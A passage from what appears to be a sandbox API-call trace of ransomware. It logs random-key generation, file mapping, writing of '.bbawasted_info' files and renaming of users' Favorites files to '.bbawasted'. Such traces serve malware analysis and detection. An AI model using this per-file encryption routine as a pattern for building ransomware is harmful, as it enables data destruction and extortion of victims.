lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.388] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.389] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.389] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.389] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.390] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.390] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.399] SetEndOfFile (hFile=0x11c) returned 1 [0077.401] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.401] CloseHandle (hObject=0x11c) returned 1 [0077.403] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.403] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.404] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.404] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.404] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0077.404] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x292) returned 0x5bf070 [0077.404] lstrcpyW (in: lpString1=0x5bf0f8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.404] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.404] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.405] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.405] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.406] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.407] SetEndOfFile (hFile=0x11c) returned 1 [0077.407] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.407] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.407] lstrcpyW (in: lpString1=0x5bf0f8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.407] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.bbawasted")) returned 1 [0077.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.410] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.411] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.412] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.412] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.412] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.412] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.412] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.421] SetEndOfFile (hFile=0x11c) returned 1 [0077.424] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.424] CloseHandle (hObject=0x11c) returned 1 [0077.426] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.426] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.427] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.427] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.427] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0077.427] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a6) returned 0x5bf070 [0077.427] lstrcpyW (in: lpString1=0x5bf10c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.427] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.427] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.428] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.428] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.430] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.431] SetEndOfFile (hFile=0x11c) returned 1 [0077.431] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.431] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.431] lstrcpyW (in: lpString1=0x5bf10c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.bbawasted")) returned 1 [0077.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.432] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.432] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.433] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.433] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.433] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.434] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.434] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.443] SetEndOfFile (hFile=0x11c) returned 1 [0077.445] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.445] CloseHandle (hObject=0x11c) returned 1 [0077.447] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.447] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.447] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.447] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.447] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 71 [0077.448] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x298) returned 0x5bf070 [0077.448] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.448] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.448] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.448] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.448] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.449] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.450] SetEndOfFile (hFile=0x11c) returned 1 [0077.450] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.450] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.450] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.450] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.bbawasted")) returned 1 [0077.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at home.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.453] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0077.453] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.454] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.454] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.454] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.455] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.455] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.464] SetEndOfFile (hFile=0x11c) returned 1 [0077.466] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.466] CloseHandle (hObject=0x11c) returned 1 [0077.467] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.467] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.468] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.468] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.468] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0077.468] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x298) returned 0x5bf070 [0077.468] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.468] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.468] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.469] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.469] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.470] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.471] SetEndOfFile (hFile=0x11c) returned 1 [0077.471] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.471] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.471] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.bbawasted")) returned 1 [0077.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.473] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.473] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.474] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.474] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.474] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.475] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.475] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.484] SetEndOfFile (hFile=0x11c) returned 1 [0077.486] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.486] CloseHandle (hObject=0x11c) returned 1 [0077.503] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.503] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.504] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.504] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.504] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0077.504] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x294) returned 0x5bf070 [0077.504] lstrcpyW (in: lpString1=0x5bf0fa, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.504] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.504] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.505] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.505] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.506] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.507] SetEndOfFile (hFile=0x11c) returned 1 [0077.507] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.507] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.507] lstrcpyW (in: lpString1=0x5bf0fa, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.bbawasted")) returned 1 [0077.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0077.535] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.536] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0077.537] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0077.537] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.537] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0077.537] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.537] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.546] SetEndOfFile (hFile=0x11c) returned 1 [0077.548] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.548] CloseHandle (hObject=0x11c) returned 1 [0077.549] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0077.549] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.551] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.551] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.551] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0077.551] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27c) returned 0x5afbd8 [0077.551] lstrcpyW (in: lpString1=0x5afc4a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.551] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0077.551] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.552] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0077.552] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.bbawasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.552] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.553] SetEndOfFile (hFile=0x11c) returned 1 [0077.554] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.554] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0077.554] lstrcpyW (in: lpString1=0x5afc4a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.bbawasted")) returned 1 [0077.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.bbawasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0077.554] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0077.555] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0077.556] CryptGenRandom (in: 